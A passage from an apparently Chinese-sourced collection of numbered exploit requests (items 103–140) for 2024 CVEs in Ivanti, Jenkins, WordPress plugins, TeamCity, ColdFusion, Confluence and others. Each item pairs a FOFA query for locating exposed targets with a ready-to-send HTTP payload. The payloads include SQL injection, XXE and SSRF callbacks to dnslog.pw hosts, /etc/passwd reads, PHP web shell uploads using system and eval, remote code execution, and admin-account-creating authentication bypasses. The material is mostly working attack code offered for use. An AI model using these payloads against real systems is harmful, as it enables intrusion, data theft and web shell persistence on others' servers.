<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML content; the XML is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-Type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "[value obtained in step 1]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

File path: boot/web/upload/weblogo/1.php
122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement after base64 encoding; the plaintext is sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the admin backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall (H5云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:1000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
